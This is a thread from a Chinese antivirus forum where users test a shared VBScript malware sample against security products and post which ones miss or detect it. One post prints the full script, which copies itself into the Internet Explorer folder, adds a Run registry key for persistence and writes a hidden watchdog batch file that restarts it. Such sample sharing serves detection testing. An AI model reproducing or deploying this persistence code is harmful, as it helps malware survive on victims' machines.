再来个VB

显示全部楼层 · 发表于 2021-1-15 11:18:49

见附件

显示全部楼层 · 发表于 2021-1-15 11:24:10

火绒miss 智量miss

显示全部楼层 · 发表于 2021-1-15 11:28:27

virus.vbs.sysautorun.a

显示全部楼层 · 发表于 2021-1-15 11:31:45

ESETmiss

显示全部楼层 · 发表于 2021-1-15 11:34:27

微软扫描没反应。

显示全部楼层 · 发表于 2021-1-15 11:40:16

卡巴斯基

显示全部楼层 · 发表于 2021-1-15 11:49:56

McAfee VSE miss

显示全部楼层 · 发表于 2021-1-15 13:44:30

MES miss

显示全部楼层 · 发表于 2021-1-15 13:45:18

Filename: vbs.vbs
Threat name: ISB.Downloader!gen52Full Path: C:\Users\NortonLTSC\Desktop\vbs.vbs

____________________________

____________________________

On computers as of
2021/1/15 at 13:45:07

Last Used
2021/1/15 at 13:45:07

Startup Item
No

Launched
No

Threat type: Heuristic Virus. Detection of a threat based on malware heuristics.

____________________________

vbs.vbs Threat name: ISB.Downloader!gen52
Locate

Very Few Users
Fewer than 5 users in the Norton Community have used this file.

Very New
This file was released less than 1 week ago.

High
This file risk is high.

____________________________

Source: External Media

____________________________

File Actions

File: C:\Users\NortonLTSC\Desktop\ vbs.vbs Blocked
____________________________

File Thumbprint - SHA:
Not available
File Thumbprint - MD5:
Not available

显示全部楼层 · 发表于 2021-1-15 13:53:44

On Error Resume Next
set xfso=createobject("scripting.filesystemobject")
set xwsh=createobject("wscript.shell")
if xfso.fileexists("C:\Program Files\Internet Explorer\sys.vbs")=false then
xfso.copyfile wscript.scriptfullname,"C:\Program Files\Internet Explorer\sys.vbs",true
xwsh.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\open","C:\Program Files\Internet Explorer\sys.vbs"
wscript.quit
end if
set x1=xfso.opentextfile("C:\Program Files\Internet Explorer\ie.bat",2,true)
x1.writeline "[url=home.php?mod=space&uid=331734]@echo[/url] off"
x1.writeline "type sys.vbs > system.txt"
x1.writeline ":loop"
x1.writeline "tasklist | find /i " & chr(34) & "wscript.exe" & chr(34) & "||goto :a"
x1.writeline "ping -n 5 127.1>nul"
x1.writeline "goto :loop"
x1.writeline ":a"
x1.writeline "type system.txt > sys.vbs"
x1.writeline "sys.vbs"
x1.writeline "ping -n 5 127.1>nul"
x1.writeline "goto :loop"
x1.close
xwsh.run "ie.bat",0
copy()
dead()
xwsh.run "sys.vbs"
function copy()
end function
function dead()
end function

复制代码

放anyrun里了，没啥行为

[病毒样本] 再来个VB

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块